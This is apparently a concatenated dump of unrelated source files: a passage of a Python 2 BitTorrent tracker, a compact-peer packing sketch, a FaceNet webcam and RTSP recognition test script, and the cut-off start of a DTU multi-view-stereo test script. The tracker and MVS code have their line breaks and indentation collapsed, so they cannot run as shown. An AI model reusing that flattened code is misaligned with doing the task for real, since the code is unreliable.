'**warning** disregarding allowed_dir' 
config['allowed_dir'] = '' self.allowed = self.state.setdefault('allowed_list',{}) self.allowed_list_mtime = 0 self.parse_allowed() self.remove_from_state('allowed','allowed_dir_files') if config['multitracker_allowed'] == 'autodetect': config['multitracker_allowed'] = 'none' config['allowed_controls'] = 0 elif config['allowed_dir']: self.allowed = self.state.setdefault('allowed',{}) self.allowed_dir_files = self.state.setdefault('allowed_dir_files',{}) self.allowed_dir_blocked = {} self.parse_allowed() self.remove_from_state('allowed_list') else: self.allowed = None self.remove_from_state('allowed','allowed_dir_files', 'allowed_list') if config['multitracker_allowed'] == 'autodetect': config['multitracker_allowed'] = 'none' config['allowed_controls'] = 0 self.uq_broken = unquote('+') != ' ' self.keep_dead = config['keep_dead'] self.Filter = Filter(rawserver.add_task) aggregator = config['aggregator'] if aggregator == '0': self.is_aggregator = False self.aggregator_key = None else: self.is_aggregator = True if aggregator == '1': self.aggregator_key = None else: self.aggregator_key = aggregator self.natcheck = False send = config['aggregate_forward'] if not send: self.aggregate_forward = None else: try: self.aggregate_forward, self.aggregate_password = send.split(',') except: self.aggregate_forward = send self.aggregate_password = None self.dedicated_seed_id = config['dedicated_seed_id'] self.is_seeded = {} self.cachetime = 0 self.cachetimeupdate() def cachetimeupdate(self): self.cachetime += 1 # raw clock, but more efficient for cache self.rawserver.add_task(self.cachetimeupdate,1) def aggregate_senddata(self, query): url = self.aggregate_forward+'?'+query if self.aggregate_password is not None: url += '&password='+self.aggregate_password rq = Thread(target = self._aggregate_senddata, args = [url]) rq.setDaemon(False) rq.start() def _aggregate_senddata(self, url): # just send, don't attempt to error check, try: # discard any returned data h = urlopen(url) h.read() h.close() except: return def get_infopage(self): try: if not self.config['show_infopage']: return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas) red = self.config['infopage_redirect'] if red: return (302, 'Found', {'Content-Type': 'text/html', 'Location': red}, '<A HREF="'+red+'">Click Here</A>') s = StringIO() s.write('<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">\n' \ '<html><head><title>BitTorrent download info</title>\n') if self.favicon is not None: s.write('<link rel="shortcut icon" href="/favicon.ico">\n') s.write('</head>\n<body>\n' \ '<h3>BitTorrent download info</h3>\n'\ '<ul>\n' '<li><strong>tracker version:</strong> %s</li>\n' \ '<li><strong>server time:</strong> %s</li>\n' \ '</ul>\n' % (version, isotime())) if self.config['allowed_dir']: if self.show_names: names = [ (self.allowed[hash]['name'],hash) for hash in self.allowed.keys() ] else: names = [ (None,hash) for hash in self.allowed.keys() ] else: names = [ (None,hash) for hash in self.downloads.keys() ] if not names: s.write('<p>not tracking any files yet...</p>\n') else: names.sort() tn = 0 tc = 0 td = 0 tt = 0 # Total transferred ts = 0 # Total size nf = 0 # Number of files displayed if self.config['allowed_dir'] and self.show_names: s.write('<table summary="files" border="1">\n' \ '<tr><th>info hash</th><th>torrent name</th><th align="right">size</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th><th 
align="right">transferred</th></tr>\n') else: s.write('<table summary="files">\n' \ '<tr><th>info hash</th><th align="right">complete</th><th align="right">downloading</th><th align="right">downloaded</th></tr>\n') for name,hash in names: l = self.downloads[hash] n = self.completed.get(hash, 0) tn = tn + n c = self.seedcount[hash] tc = tc + c d = len(l) - c td = td + d if self.config['allowed_dir'] and self.show_names: if self.allowed.has_key(hash): nf = nf + 1 sz = self.allowed[hash]['length'] # size ts = ts + sz szt = sz * n # Transferred for this torrent tt = tt + szt if self.allow_get == 1: linkname = '<a href="/file?info_hash=' + quote(hash) + '">' + name + '</a>' else: linkname = name s.write('<tr><td><code>%s</code></td><td>%s</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' \ % (b2a_hex(hash), linkname, size_format(sz), c, d, n, size_format(szt))) else: s.write('<tr><td><code>%s</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td><td align="right"><code>%i</code></td></tr>\n' \ % (b2a_hex(hash), c, d, n)) if self.config['allowed_dir'] and self.show_names: s.write('<tr><td align="right" colspan="2">%i files</td><td align="right">%s</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td><td align="right">%s</td></tr>\n' % (nf, size_format(ts), tc, td, tn, size_format(tt))) else: s.write('<tr><td align="right">%i files</td><td align="right">%i</td><td align="right">%i</td><td align="right">%i</td></tr>\n' % (nf, tc, td, tn)) s.write('</table>\n' \ '<ul>\n' \ '<li><em>info hash:</em> SHA1 hash of the "info" section of the metainfo (*.torrent)</li>\n' \ '<li><em>complete:</em> number of connected clients with the complete file</li>\n' \ '<li><em>downloading:</em> number of connected clients still downloading</li>\n' \ '<li><em>downloaded:</em> reported complete downloads</li>\n' \ '<li><em>transferred:</em> torrent size * total downloaded (does not include partial transfers)</li>\n' \ '</ul>\n') s.write('</body>\n' \ '</html>\n') return (200, 'OK', {'Content-Type': 'text/html; charset=iso-8859-1'}, s.getvalue()) except: print_exc() return (500, 'Internal Server Error', {'Content-Type': 'text/html; charset=iso-8859-1'}, 'Server Error') def scrapedata(self, hash, return_name = True): l = self.downloads[hash] n = self.completed.get(hash, 0) c = self.seedcount[hash] d = len(l) - c f = {'complete': c, 'incomplete': d, 'downloaded': n} if return_name and self.show_names and self.config['allowed_dir']: f['name'] = self.allowed[hash]['name'] return (f) def get_scrape(self, paramslist): fs = {} if paramslist.has_key('info_hash'): if self.config['scrape_allowed'] not in ['specific', 'full']: return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'specific scrape function is not available with this tracker.'})) for hash in paramslist['info_hash']: if self.allowed is not None: if self.allowed.has_key(hash): fs[hash] = self.scrapedata(hash) else: if self.downloads.has_key(hash): fs[hash] = self.scrapedata(hash) else: if self.config['scrape_allowed'] != 'full': return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'full scrape function is not available with this tracker.'})) if self.allowed is not None: keys = self.allowed.keys() else: keys = self.downloads.keys() for hash in keys: fs[hash] = self.scrapedata(hash) return (200, 'OK', 
{'Content-Type': 'text/plain'}, bencode({'files': fs})) def get_file(self, hash): if not self.allow_get: return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, 'get function is not available with this tracker.') if not self.allowed.has_key(hash): return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas) fname = self.allowed[hash]['file'] fpath = self.allowed[hash]['path'] return (200, 'OK', {'Content-Type': 'application/x-bittorrent', 'Content-Disposition': 'attachment; filename=' + fname}, open(fpath, 'rb').read()) def check_allowed(self, infohash, paramslist): if ( self.aggregator_key is not None and not ( paramslist.has_key('password') and paramslist['password'][0] == self.aggregator_key ) ): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'Requested download is not authorized for use with this tracker.'})) if self.allowed is not None: if not self.allowed.has_key(infohash): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'Requested download is not authorized for use with this tracker.'})) if self.config['allowed_controls']: if self.allowed[infohash].has_key('failure reason'): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': self.allowed[infohash]['failure reason']})) if paramslist.has_key('tracker'): if ( self.config['multitracker_allowed'] == 'none' or # turned off paramslist['peer_id'][0] == self.trackerid ): # oops! contacted myself return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'disallowed'})) if ( self.config['multitracker_allowed'] == 'autodetect' and not self.allowed[infohash].has_key('announce-list') ): return (200, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'Requested download is not authorized for multitracker use.'})) return None def cache_default(self): return [({},{}) for i in xrange(self.cache_default_len)] def add_data(self, infohash, event, ip, paramslist): peers = self.downloads.setdefault(infohash, {}) ts = self.times.setdefault(infohash, {}) self.completed.setdefault(infohash, 0) self.seedcount.setdefault(infohash, 0) def params(key, default = None, l = paramslist): if l.has_key(key): return l[key][0] return default myid = params('peer_id','') if len(myid) != 20: raise ValueError, 'id not of length 20' if event not in ['started', 'completed', 'stopped', 'snooped', None]: raise ValueError, 'invalid event' port = params('cryptoport') if port is None: port = params('port','') port = long(port) if port < 0 or port > 65535: raise ValueError, 'invalid port' left = long(params('left','')) if left < 0: raise ValueError, 'invalid amount left' uploaded = long(params('uploaded','')) downloaded = long(params('downloaded','')) if params('supportcrypto'): supportcrypto = 1 try: s = int(params['requirecrypto']) chr(s) except: s = 0 requirecrypto = s else: supportcrypto = 0 requirecrypto = 0 peer = peers.get(myid) islocal = local_IPs.includes(ip) mykey = params('key') if peer: auth = peer.get('key',-1) == mykey or peer.get('ip') == ip gip = params('ip') if is_valid_ip(gip) and (islocal or not self.only_local_override_ip): ip1 = gip else: ip1 = ip if params('numwant') is not None: rsize = min(int(params('numwant')),self.response_size) else: rsize = self.response_size if event == 'stopped': if peer: if auth: 
self.delete_peer(infohash,myid) elif not peer: ts[myid] = clock() peer = { 'ip': ip, 'port': port, 'left': left, 'supportcrypto': supportcrypto, 'requirecrypto': requirecrypto } if mykey: peer['key'] = mykey if gip: peer['given ip'] = gip if port: if not self.natcheck or islocal: peer['nat'] = 0 self.natcheckOK(infohash,myid,ip1,port,peer) else: NatCheck(self.connectback_result,infohash,myid,ip1,port, self.rawserver,encrypted=requirecrypto) else: peer['nat'] = 2**30 if event == 'completed': self.completed[infohash] += 1 if not left: self.seedcount[infohash] += 1 peers[myid] = peer else: if not auth: return rsize # return w/o changing stats ts[myid] = clock() if not left and peer['left']: self.completed[infohash] += 1 self.seedcount[infohash] += 1 if not peer.get('nat', -1): for bc in self.becache[infohash]: x = bc[0].get(myid) if x: bc[1][myid] = x del bc[0][myid] elif left and not peer['left']: self.completed[infohash] -= 1 self.seedcount[infohash] -= 1 if not peer.get('nat', -1): for bc in self.becache[infohash]: x = bc[1].get(myid) if x: bc[0][myid] = x del bc[1][myid] peer['left'] = left if port: recheck = False if ip != peer['ip']: peer['ip'] = ip recheck = True if gip != peer.get('given ip'): if gip: peer['given ip'] = gip elif peer.has_key('given ip'): del peer['given ip'] recheck = True natted = peer.get('nat', -1) if recheck: if natted == 0: l = self.becache[infohash] y = not peer['left'] for x in l: if x[y].has_key(myid): del x[y][myid] if natted >= 0: del peer['nat'] # restart NAT testing if natted and natted < self.natcheck: recheck = True if recheck: if not self.natcheck or islocal: peer['nat'] = 0 self.natcheckOK(infohash,myid,ip1,port,peer) else: NatCheck(self.connectback_result,infohash,myid,ip1,port, self.rawserver,encrypted=requirecrypto) return rsize def peerlist(self, infohash, stopped, tracker, is_seed, return_type, rsize, supportcrypto): data = {} # return data seeds = self.seedcount[infohash] data['complete'] = seeds data['incomplete'] = len(self.downloads[infohash]) - seeds if ( self.config['allowed_controls'] and self.allowed[infohash].has_key('warning message') ): data['warning message'] = self.allowed[infohash]['warning message'] if tracker: data['interval'] = self.config['multitracker_reannounce_interval'] if not rsize: return data cache = self.cached_t.setdefault(infohash, None) if ( not cache or len(cache[1]) < rsize or cache[0] + self.config['min_time_between_cache_refreshes'] < clock() ): bc = self.becache.setdefault(infohash,self.cache_default()) cache = [ clock(), bc[0][0].values() + bc[0][1].values() ] self.cached_t[infohash] = cache shuffle(cache[1]) cache = cache[1] data['peers'] = cache[-rsize:] del cache[-rsize:] return data data['interval'] = self.reannounce_interval if stopped or not rsize: # save some bandwidth data['peers'] = [] return data bc = self.becache.setdefault(infohash,self.cache_default()) len_l = len(bc[2][0]) len_s = len(bc[2][1]) if not (len_l+len_s): # caches are empty! 
data['peers'] = [] return data l_get_size = int(float(rsize)*(len_l)/(len_l+len_s)) if self.config['compact_reqd']: cache = self.cached.setdefault(infohash,[None,None,None])[return_type] else: cache = self.cached.setdefault(infohash,[None,None,None,None,None])[return_type] if cache and ( not cache[1] or (is_seed and len(cache[1]) < rsize) or len(cache[1]) < l_get_size or cache[0]+self.config['min_time_between_cache_refreshes'] < self.cachetime ): cache = None if not cache: peers = self.downloads[infohash] if self.config['compact_reqd']: vv = ([],[],[]) else: vv = ([],[],[],[],[]) for key, ip, port in self.t2tlist.harvest(infohash): # empty if disabled if not peers.has_key(key): cp = compact_peer_info(ip, port) vv[0].append(cp) vv[2].append((cp,'\x00')) if not self.config['compact_reqd']: vv[3].append({'ip': ip, 'port': port, 'peer id': key}) vv[4].append({'ip': ip, 'port': port}) cache = [ self.cachetime, bc[return_type][0].values()+vv[return_type], bc[return_type][1].values() ] shuffle(cache[1]) shuffle(cache[2]) self.cached[infohash][return_type] = cache for rr in xrange(len(self.cached[infohash])): if rr != return_type: try: self.cached[infohash][rr][1].extend(vv[rr]) except: pass if len(cache[1]) < l_get_size: peerdata = cache[1] if not is_seed: peerdata.extend(cache[2]) cache[1] = [] cache[2] = [] else: if not is_seed: peerdata = cache[2][l_get_size-rsize:] del cache[2][l_get_size-rsize:] rsize -= len(peerdata) else: peerdata = [] if rsize: peerdata.extend(cache[1][-rsize:]) del cache[1][-rsize:] if return_type == 0: data['peers'] = ''.join(peerdata) elif return_type == 1: data['crypto_flags'] = "0x01"*len(peerdata) data['peers'] = ''.join(peerdata) elif return_type == 2: data['crypto_flags'] = ''.join([p[1] for p in peerdata]) data['peers'] = ''.join([p[0] for p in peerdata]) else: data['peers'] = peerdata return data def get(self, connection, path, headers): real_ip = connection.get_ip() ip = real_ip if is_ipv4(ip): ipv4 = True else: try: ip = ipv6_to_ipv4(ip) ipv4 = True except ValueError: ipv4 = False if ( (self.allowed_IPs and not self.allowed_IPs.includes(ip)) or (self.banned_IPs and self.banned_IPs.includes(ip)) ): return (400, 'Not Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': 'your IP is not allowed on this tracker'})) nip = get_forwarded_ip(headers) if nip and not self.only_local_override_ip: ip = nip try: ip = to_ipv4(ip) ipv4 = True except ValueError: ipv4 = False paramslist = {} def params(key, default = None, l = paramslist): if l.has_key(key): return l[key][0] return default try: (scheme, netloc, path, pars, query, fragment) = urlparse(path) if self.uq_broken == 1: path = path.replace('+',' ') query = query.replace('+',' ') path = unquote(path)[1:] for s in query.split('&'): if s: i = s.index('=') kw = unquote(s[:i]) paramslist.setdefault(kw, []) paramslist[kw] += [unquote(s[i+1:])] if path == '' or path == 'index.html': return self.get_infopage() if (path == 'file'): return self.get_file(params('info_hash')) if path == 'favicon.ico' and self.favicon is not None: return (200, 'OK', {'Content-Type' : 'image/x-icon'}, self.favicon) # automated access from here on if path in ('scrape', 'scrape.php', 'tracker.php/scrape'): return self.get_scrape(paramslist) if not path in ('announce', 'announce.php', 'tracker.php/announce'): return (404, 'Not Found', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, alas) # main tracker function filtered = self.Filter.check(real_ip, paramslist, headers) if filtered: return (400, 'Not 
Authorized', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'failure reason': filtered})) infohash = params('info_hash') if not infohash: raise ValueError, 'no info hash' notallowed = self.check_allowed(infohash, paramslist) if notallowed: return notallowed event = params('event') rsize = self.add_data(infohash, event, ip, paramslist) if event == 'completed': self.completedno=self.completedno+1 print "complete : %s" % self.completedno except ValueError, e: return (400, 'Bad Request', {'Content-Type': 'text/plain'}, 'you sent me garbage - ' + str(e)) if self.aggregate_forward and not paramslist.has_key('tracker'): self.aggregate_senddata(query) if self.is_aggregator: # don't return peer data here return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode({'response': 'OK'})) if params('compact') and ipv4: if params('requirecrypto'): return_type = 1 elif params('supportcrypto'): return_type = 2 else: return_type = 0 elif self.config['compact_reqd'] and ipv4: return (400, 'Bad Request', {'Content-Type': 'text/plain'}, 'your client is outdated, please upgrade') elif params('no_peer_id'): return_type = 4 else: return_type = 3 data = self.peerlist(infohash, event=='stopped', params('tracker'), not params('left'), return_type, rsize, params('supportcrypto')) if paramslist.has_key('scrape'): # deprecated data['scrape'] = self.scrapedata(infohash, False) if self.dedicated_seed_id: if params('seed_id') == self.dedicated_seed_id and params('left') == 0: self.is_seeded[infohash] = True if params('check_seeded') and self.is_seeded.get(infohash): data['seeded'] = 1 return (200, 'OK', {'Content-Type': 'text/plain', 'Pragma': 'no-cache'}, bencode(data)) def natcheckOK(self, infohash, peerid, ip, port, peer): seed = not peer['left'] bc = self.becache.setdefault(infohash,self.cache_default()) cp = compact_peer_info(ip, port) reqc = peer['requirecrypto'] bc[2][seed][peerid] = (cp,chr(reqc)) if peer['supportcrypto']: bc[1][seed][peerid] = cp if not reqc: bc[0][seed][peerid] = cp if not self.config['compact_reqd']: bc[3][seed][peerid] = Bencached(bencode({'ip': ip, 'port': port, 'peer id': peerid})) bc[4][seed][peerid] = Bencached(bencode({'ip': ip, 'port': port})) def natchecklog(self, peerid, ip, port, result): year, month, day, hour, minute, second, a, b, c = localtime(time()) print '%s - %s [%02d/%3s/%04d:%02d:%02d:%02d] "!natcheck-%s:%i" %i 0 - -' % ( ip, quote(peerid), day, months[month], year, hour, minute, second, ip, port, result) def connectback_result(self, result, downloadid, peerid, ip, port): record = self.downloads.get(downloadid,{}).get(peerid) if ( record is None or (record['ip'] != ip and record.get('given ip') != ip) or record['port'] != port ): if self.config['log_nat_checks']: self.natchecklog(peerid, ip, port, 404) return if self.config['log_nat_checks']: if result: x = 200 else: x = 503 self.natchecklog(peerid, ip, port, x) if not record.has_key('nat'): record['nat'] = int(not result) if result: self.natcheckOK(downloadid,peerid,ip,port,record) elif result and record['nat']: record['nat'] = 0 self.natcheckOK(downloadid,peerid,ip,port,record) elif not result: record['nat'] += 1 def remove_from_state(self, *l): for s in l: try: del self.state[s] except: pass def save_state(self): print "save state" self.rawserver.add_task(self.save_state, self.save_dfile_interval) h = open(self.dfile, 'wb') h.write(bencode(self.state)) h.close() def test_state_and_finish(self): exit = 0 elapsed = time() - self.tracker_inittime #print "config %s %s" % 
(self.tracker_max_completed, self.tracker_timeout) #print "show state" #print self.state["completed"] for k,v in self.state["completed"].items(): #print "completed %s and elapsed %s " % (v, elapsed) # Somehow the non-present event also +1 for self.state["completed"].items(), hence here # we use self.completedno #if self.tracker_max_completed != 0 and v >= self.tracker_max_completed: if self.tracker_max_completed != 0 and self.completedno >= self.tracker_max_completed: exit = 1 if self.tracker_timeout != 0 and elapsed >= self.tracker_timeout: exit = 1 if exit == 1: self.rawserver.shutdown() self.rawserver.set_finish() self.rawserver.add_task(self.test_state_and_finish, 5) def parse_allowed(self): self.rawserver.add_task(self.parse_allowed, self.parse_dir_interval) if self.config['allowed_dir']: r = parsedir( self.config['allowed_dir'], self.allowed, self.allowed_dir_files, self.allowed_dir_blocked, [".torrent"] ) ( self.allowed, self.allowed_dir_files, self.allowed_dir_blocked, added, garbage2 ) = r self.state['allowed'] = self.allowed self.state['allowed_dir_files'] = self.allowed_dir_files self.t2tlist.parse(self.allowed) else: f = self.config['allowed_list'] if self.allowed_list_mtime == os.path.getmtime(f): return try: r = parsetorrentlist(f, self.allowed) (self.allowed, added, garbage2) = r self.state['allowed_list'] = self.allowed except (IOError, OSError): print '**warning** unable to read allowed torrent list' return self.allowed_list_mtime = os.path.getmtime(f) for infohash in added.keys(): self.downloads.setdefault(infohash, {}) self.completed.setdefault(infohash, 0) self.seedcount.setdefault(infohash, 0) def read_ip_lists(self): self.rawserver.add_task(self.read_ip_lists,self.parse_dir_interval) f = self.config['allowed_ips'] if f and self.allowed_ip_mtime != os.path.getmtime(f): self.allowed_IPs = IP_List() try: self.allowed_IPs.read_fieldlist(f) self.allowed_ip_mtime = os.path.getmtime(f) except (IOError, OSError): print '**warning** unable to read allowed_IP list' f = self.config['banned_ips'] if f and self.banned_ip_mtime != os.path.getmtime(f): self.banned_IPs = IP_Range_List() try: self.banned_IPs.read_rangelist(f) self.banned_ip_mtime = os.path.getmtime(f) except (IOError, OSError): print '**warning** unable to read banned_IP list' def delete_peer(self, infohash, peerid): dls = self.downloads[infohash] peer = dls[peerid] if not peer['left']: self.seedcount[infohash] -= 1 if not peer.get('nat',-1): l = self.becache[infohash] y = not peer['left'] for x in l: if x[y].has_key(peerid): del x[y][peerid] del self.times[infohash][peerid] del dls[peerid] def expire_downloaders(self): for x in self.times.keys(): for myid, t in self.times[x].items(): if t < self.prevtime: self.delete_peer(x,myid) self.prevtime = clock() if (self.keep_dead != 1): for key, value in self.downloads.items(): if len(value) == 0 and ( self.allowed is None or not self.allowed.has_key(key) ): del self.times[key] del self.downloads[key] del self.seedcount[key] self.rawserver.add_task(self.expire_downloaders, self.timeout_downloaders_interval) def track(args): if len(args) == 0: print formatDefinitions(defaults, 80) return try: config, files = parseargs(args, defaults, 0, 0) except ValueError, e: print 'error: ' + str(e) print 'run with no arguments for parameter explanations' return r = RawServer(Event(), config['timeout_check_interval'], config['socket_timeout'], ipv6_enable = config['ipv6_enabled']) t = Tracker(config, r) r.bind(config['port'], config['bind'], reuse = True, ipv6_socket_style = 
config['ipv6_binds_v4']) r.listen_forever(HTTPHandler(t.get, config['min_time_between_log_flushes'])) t.save_state() t.test_state_and_finish() print '# Shutting down: ' + isotime() def size_format(s): if (s < 1024): r = str(s) + 'B' elif (s < 1048576): r = str(int(s/1024)) + 'KiB' elif (s < 1073741824L): r = str(int(s/1048576)) + 'MiB' elif (s < 1099511627776L): r = str(int((s/1073741824.0)*100.0)/100.0) + 'GiB' else: r = str(int((s/1099511627776.0)*100.0)/100.0) + 'TiB' return(r)
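# The tracker's compact_peer_info() above packs each peer into 6 bytes: the four
# octets of the IPv4 address followed by the port in network (big-endian) byte
# order, and the compact announce response (return_type 0) is simply the
# concatenation of those entries. Below is a minimal Python 3 sketch of the same
# packing/unpacking using the struct module, for illustration only; the helper
# names are hypothetical and are not part of the tracker code above.
import socket
import struct


def pack_compact_peer(ip, port):
    # 4-byte IPv4 address + 2-byte big-endian port, as compact_peer_info() builds by hand
    return socket.inet_aton(ip) + struct.pack('>H', port)


def unpack_compact_peers(blob):
    # split a compact 'peers' blob back into (ip, port) tuples
    return [(socket.inet_ntoa(blob[i:i + 4]), struct.unpack('>H', blob[i + 4:i + 6])[0])
            for i in range(0, len(blob), 6)]


# Example: pack_compact_peer('10.0.0.1', 6881) == b'\n\x00\x00\x01\x1a\xe1'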
test_facenet_recognition.py
import cv2
from test_facenet_register import FaceRecognition
from PIL import Image, ImageDraw
import multiprocessing as mp
import time

face_recognition = FaceRecognition("config_facenet.yaml")


def recognition_photo():
    frame = Image.open('datasets/multiface.jpg')
    results = face_recognition.recognition(frame)
    print(results)
    frame_draw = frame.copy()
    draw = ImageDraw.Draw(frame_draw)
    for result in results:
        draw.rectangle(result["bbox"], outline=(255, 255, 255))
        if len(result["userid"]) > 0:
            userid = result["userid"].split("_")
            userid.pop(len(userid) - 1)
            draw.text((int(result["bbox"][0]), int(result["bbox"][1])), str("_".join(userid)),
                      fill=(255, 255, 255), font=face_recognition.font)
        if result.get("emotion") is not None and len(result["emotion"]) > 0:
            draw.text((int(result["bbox"][0]), int(result["bbox"][1] + 20)), str(result["emotion"]),
                      fill=(255, 255, 255), font=face_recognition.font)
    frame_draw.save('output/multiface_facenet.jpg')


def recognition_video():
    camara = cv2.VideoCapture(0)
    camara.set(cv2.CAP_PROP_FRAME_WIDTH, 500)
    camara.set(cv2.CAP_PROP_FRAME_HEIGHT, 500)
    camara.set(cv2.CAP_PROP_FPS, 25)
    while True:
        # read a frame from the camera
        ret, frame = camara.read()
        if ret:
            frame = cv2.flip(frame, 1)
            results = face_recognition.recognition(Image.fromarray(frame))
            print(results)
            if results is not None:
                for result in results:
                    cv2.rectangle(frame, (int(result['bbox'][0]), int(result['bbox'][1])),
                                  (int(result['bbox'][2]), int(result['bbox'][3])), (255, 255, 255), 2)
                    if len(result["userid"]) > 0:
                        userid = result["userid"].split("_")
                        userid.pop(len(userid) - 1)
                        cv2.putText(frame, str("_".join(userid)), (int(result['bbox'][0]), int(result['bbox'][1])),
                                    cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255))
                    if result.get("emotion") is not None and len(result["emotion"]) > 0:
                        cv2.putText(frame, str(result["emotion"]),
                                    (int(result['bbox'][0]), int(result['bbox'][1] + 20)),
                                    cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255))
            cv2.imshow('recognition_face', frame)
            if (cv2.waitKey(1) & 0xFF) == ord('q'):
                break
    camara.release()
    cv2.destroyAllWindows()


def camera_put(queue, url):
    cap = cv2.VideoCapture(url)
    cap.set(cv2.CAP_PROP_FRAME_WIDTH, 500)
    cap.set(cv2.CAP_PROP_FRAME_HEIGHT, 500)
    cap.set(cv2.CAP_PROP_FPS, 25)
    if cap.isOpened():
        print(f"Video source: {url}")
    while True:
        ret, frame = cap.read()
        if ret:
            queue.put(frame)
            time.sleep(0.01)


def camera_get(queue, winname):
    cv2.namedWindow(winname, flags=cv2.WINDOW_FREERATIO)
    while True:
        frame = queue.get()
        frame = cv2.flip(frame, 1)
        results = face_recognition.recognition(Image.fromarray(frame))
        print(results)
        if results is not None:
            for result in results:
                cv2.rectangle(frame, (int(result['bbox'][0]), int(result['bbox'][1])),
                              (int(result['bbox'][2]), int(result['bbox'][3])), (255, 255, 255), 2)
                if len(result["userid"]) > 0:
                    userid = result["userid"].split("_")
                    userid.pop(len(userid) - 1)
                    cv2.putText(frame, str("_".join(userid)), (int(result['bbox'][0]), int(result['bbox'][1])),
                                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255))
                if result.get("emotion") is not None and len(result["emotion"]) > 0:
                    cv2.putText(frame, str(result["emotion"]),
                                (int(result['bbox'][0]), int(result['bbox'][1] + 20)),
                                cv2.FONT_HERSHEY_SIMPLEX, 0.7, (255, 255, 255))
        cv2.imshow(winname, frame)
        cv2.waitKey(1)


def run_single_camera():
    mp.set_start_method(method='spawn')  # init
    queue = mp.Queue(maxsize=2)
    camera_url = 0
    processes = [mp.Process(target=camera_put, args=(queue, camera_url)),
                 mp.Process(target=camera_get, args=(queue, f"{camera_url}"))]
    [process.start() for process in processes]
    [process.join() for process in processes]


def run_multi_camera():
    camera_urls = [
        "rtsp://username:password@192.168.1.100/h264/ch1/main/av_stream",
        "rtsp://username:password@192.168.1.101//Streaming/Channels/1",
        "rtsp://username:password@192.168.1.102/cam/realmonitor?channel=1&subtype=0"
    ]
    mp.set_start_method(method='spawn')  # init
    queues = [mp.Queue(maxsize=4) for _ in camera_urls]
    processes = []
    for queue, camera_url in zip(queues, camera_urls):
        # the original referenced undefined image_put/image_get;
        # use the camera_put/camera_get producer and consumer defined above
        processes.append(mp.Process(target=camera_put, args=(queue, camera_url)))
        processes.append(mp.Process(target=camera_get, args=(queue, camera_url)))
    for process in processes:
        process.daemon = True
        process.start()
    for process in processes:
        process.join()


if __name__ == '__main__':
    # recognition_photo()
    # recognition_video()
    run_single_camera()
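# run_single_camera() above decouples frame capture from the slower recognition
# step with a small bounded multiprocessing.Queue: one process keeps pushing
# frames while the other consumes them at its own pace. Below is a stripped-down
# sketch of the same producer/consumer pattern without the FaceRecognition
# dependency; the function names are hypothetical and this is illustration only.
import multiprocessing as mp
import time

import cv2


def produce_frames(queue, source=0):
    cap = cv2.VideoCapture(source)
    while True:
        ret, frame = cap.read()
        if ret:
            queue.put(frame)  # blocks when the bounded queue is full
            time.sleep(0.01)


def consume_frames(queue, winname="preview"):
    while True:
        frame = queue.get()  # blocks until a frame is available
        cv2.imshow(winname, cv2.flip(frame, 1))
        if (cv2.waitKey(1) & 0xFF) == ord('q'):
            break


if __name__ == '__main__':
    q = mp.Queue(maxsize=2)
    workers = [mp.Process(target=produce_frames, args=(q, 0)),
               mp.Process(target=consume_frames, args=(q,))]
    [w.start() for w in workers]
    [w.join() for w in workers]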
test_dtu.py
from __future__ import print_function import multiprocessing from model import * from preprocess import * from tools.common import Notify import tensorflow as tf import matplotlib.pyplot as plt import os import time import sys import math import argparse import numpy as np import cv2 import matplotlib matplotlib.use('Agg') sys.path.append("../") # dataset parameters tf.app.flags.DEFINE_string('dense_folder', '/home/tejas/unsup_mvs/data/mvs_testing/dtu', """Root path to dense folder.""") tf.app.flags.DEFINE_string('output_folder', '/home/tejas/unsup_mvs/outputs/', """Root path to output folder.""") tf.app.flags.DEFINE_string('model_dir', '/home/tejas/unsup_mvs/saved_models/lambda1_128_nc3', """Path to restore the model.""") tf.app.flags.DEFINE_integer('ckpt_step', 45000, """ckpt step.""") # input parameters tf.app.flags.DEFINE_integer('view_num', 5, """Number of images (1 ref image and view_num - 1 view images).""") tf.app.flags.DEFINE_integer('max_d', 256, """Maximum depth step when testing.""") tf.app.flags.DEFINE_integer('max_w', 640, """Maximum image width when testing.""") tf.app.flags.DEFINE_integer('max_h', 512, """Maximum image height when testing.""") tf.app.flags.DEFINE_float('sample_scale', 0.25, """Downsample scale for building cost volume (W and H).""") tf.app.flags.DEFINE_float('interval_scale', 0.8, """Downsample scale for building cost volume (D).""") tf.app.flags.DEFINE_float('base_image_size', 8, """Base image size""") tf.app.flags.DEFINE_integer('batch_size', 1, """Testing batch size.""") tf.app.flags.DEFINE_bool('adaptive_scaling', True, """Let image size to fit the network, including 'scaling', 'cropping'""") FLAGS = tf.app.flags.FLAGS class MVSGenerator: """ data generator class, tf only accept generator without param """ def __init__(self, sample_list, view_num, mode): self.sample_list = sample_list self.view_num = view_num self.mode = mode self.sample_num = len(sample_list) self.counter = 0 def __iter__(self): while True: for data in self.sample_list: # read input data images = [] cams = [] image_index = 